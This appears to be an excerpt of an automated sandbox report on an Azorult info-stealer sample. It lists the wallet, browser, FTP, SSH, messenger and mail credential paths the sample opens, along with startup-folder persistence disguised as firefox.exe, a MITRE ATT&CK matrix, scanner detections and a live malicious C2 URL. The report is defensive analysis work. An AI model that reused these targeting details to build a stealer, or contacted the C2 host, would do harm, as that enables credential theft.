Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Code function: 7_2_00417098 GetTimeZoneInformation,

7_2_00417098

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Code function: 7_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,

7_2_00404C15

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Azorult

Source: Yara match	File source: 7.2.jd4t3R7hOq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jd4t3R7hOq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1424878829.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1429821413.0000000004210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jd4t3R7hOq.exe PID: 7572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jd4t3R7hOq.exe PID: 7816, type: MEMORYSTR

Yara detected Azorult Info Stealer

Source: Yara match	File source: 7.2.jd4t3R7hOq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jd4t3R7hOq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jd4t3R7hOq.exe PID: 7572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jd4t3R7hOq.exe PID: 7816, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: jd4t3R7hOq.exe, 00000007.00000002.1423629865.0000000001528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 6%appdata%\Electrum\wallets\tX
Source: jd4t3R7hOq.exe, 00000007.00000002.1423629865.0000000001528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 6%appdata%\Electrum\wallets\tX
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Exodus\
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Exodus\
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: powershell.exe, 00000005.00000002.1323184489.00000000076A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File opened: C:\Users\user\AppData\Roaming\ElectrumG\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-btcp\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File opened: C:\Users\user\AppData\Roaming\Exodus Eden\	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml			Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Source: Yara match	File source: 7.2.jd4t3R7hOq.exe.46644cd.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jd4t3R7hOq.exe.4668c37.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jd4t3R7hOq.exe.466d39f.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jd4t3R7hOq.exe PID: 7816, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	12 Registry Run Keys / Startup Folder	11 Process Injection	1 Deobfuscate/Decode Files or Information	2 Credentials in Registry	3 File and Directory Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	12 Registry Run Keys / Startup Folder	3 Obfuscated Files or Information	1 Credentials In Files	45 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	121 Security Software Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	41 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
jd4t3R7hOq.exe	77%	Virustotal		Browse
jd4t3R7hOq.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.Injuke
jd4t3R7hOq.exe	100%	Avira	HEUR/AGEN.1309847
jd4t3R7hOq.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-multibyte-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-private-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-runtime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-stdio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-time-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-utility-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\freebl3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\mozglue.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\nss3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\nssdbm3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\softokn3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\ucrtbase.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8F3E16B2\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.Injuke

Source	Detection	Scanner	Label
http://ls14.icu/HK341/index.phpl	0%	Avira URL Cloud	safe
http://ls14.icu/HK341/index.phpR	0%	Avira URL Cloud	safe
http://ls14.icu/HK341/index.php	100%	Avira URL Cloud	malware
http://ls14.icu/HK341/index.php-mQm(	0%	Avira URL Cloud	safe
http://ls14.icu/HK341/index.phpP_Ul	0%	Avira URL Cloud	safe
https://dotbit.me/a/	0%	Avira URL Cloud	safe
http://ls14.icu/HK341/index.phpU#	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ls14.icu	104.21.75.48	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ls14.icu/HK341/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.1320279649.000000000599B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1479196509.000000000595A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.7.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.1461318819.0000000004A42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB_q	powershell.exe, 00000005.00000002.1317553583.0000000004931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1461318819.00000000048F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ls14.icu/HK341/index.phpl	jd4t3R7hOq.exe, 00000007.00000002.1424878829.00000000030C0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsoft	powershell.exe, 00000005.00000002.1321553619.000000000727A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.1461318819.0000000004A42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	false		high
http://ip-api.com/json	jd4t3R7hOq.exe, jd4t3R7hOq.exe, 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2549394624.0000000003617000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000E.00000002.1479196509.000000000595A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.mozilla.com0	jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	false		high
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.1479196509.000000000595A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dotbit.me/a/	jd4t3R7hOq.exe, jd4t3R7hOq.exe, 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000008.00000002.2535424632.000002CE500B2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000008.00000003.1314507742.000002CE4FE00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	false		high
http://ls14.icu/HK341/index.phpP_Ul	firefox.exe, 00000011.00000002.1466966401.000000000129B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.1461318819.0000000004A42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod.C:	edb.log.8.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	false		high
https://contoso.com/	powershell.exe, 0000000E.00000002.1479196509.000000000595A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.1320279649.000000000599B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1479196509.000000000595A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ls14.icu/HK341/index.phpR	firefox.exe, 00000011.00000002.1466966401.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ls14.icu/HK341/index.php-mQm(	firefox.exe, 00000011.00000002.1466966401.000000000129B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ls14.icu/HK341/index.phpU#	jd4t3R7hOq.exe, 00000007.00000002.1423629865.000000000156B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.1317553583.0000000004931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1461318819.00000000048F1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.75.48	ls14.icu	United States		13335	CLOUDFLARENETUS	true

Private

